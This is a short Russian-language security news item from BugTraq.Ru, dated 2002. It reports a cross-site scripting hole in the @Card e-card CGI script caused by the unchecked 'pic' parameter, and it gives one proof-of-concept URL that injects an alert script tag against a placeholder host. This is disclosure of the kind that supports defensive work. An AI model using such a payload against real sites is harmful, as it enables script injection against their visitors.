BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2002/07/28.html

В меру опасные виртуальные открытки
dl // 20.07.02 01:09
@Card - система/скрипт посылки виртуальных открыток.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2002/07/28.html]
Присутствует уязвимость использования XSS. Из-за отсутствия проверки переменной 'pic' атакующий имеет возможность удалённо исполнить любой код в браузере из уязвимого сервера заменив или добавив к используемой открытке, код с закрытием кавычки в начале.

--Использование--
www.vulnerable.url/cgi-bin/ecards/upcardme.cgi?step=1&pic=Spider_Man/ 2733369507.jpg><script>alert("eraser%20was%20here%20:)")</script> &lang=english.pm

Источник: Advisory by Eraser    
теги: xss  |  предложить новость  |  обсудить  |  все отзывы (0) [4996]
назад «  » вперед

аналогичные материалы
Имя компании как средство XSS-атаки // 30.10.20 17:01
XSS в школьном журнале // 01.10.12 20:06
Кража кук через поддомены - еще один привет из прошлого // 04.11.09 11:17
Победа российской команды на C.I.P.H.E.R. 4 // 04.08.08 01:17
Тысячи сайтов продолжают раздавать опасные флеш-ролики // 28.03.08 00:59
Apple залатала 13 дырок в Safari // 18.03.08 23:01
Первая атака на маршрутизаторы с использованием XSS // 24.01.08 21:24
 
последние новости
Microsoft обещает радикально усилить безопасность Windows в следующем году // 19.11.24 17:09
Ядро Linux избавляется от российских мейнтейнеров // 23.10.24 23:10
20 лет Ubuntu // 20.10.24 19:11
Tailscale окончательно забанила российские адреса // 02.10.24 18:54
Прекращение работы антивируса Касперского в США // 30.09.24 17:30
Microsoft Authenticator теряет пользовательские аккаунты // 05.08.24 22:21
Облачнолазурное // 31.07.24 17:34





  Copyright © 2001-2024 Dmitry Leonov Design: Vadim Derkach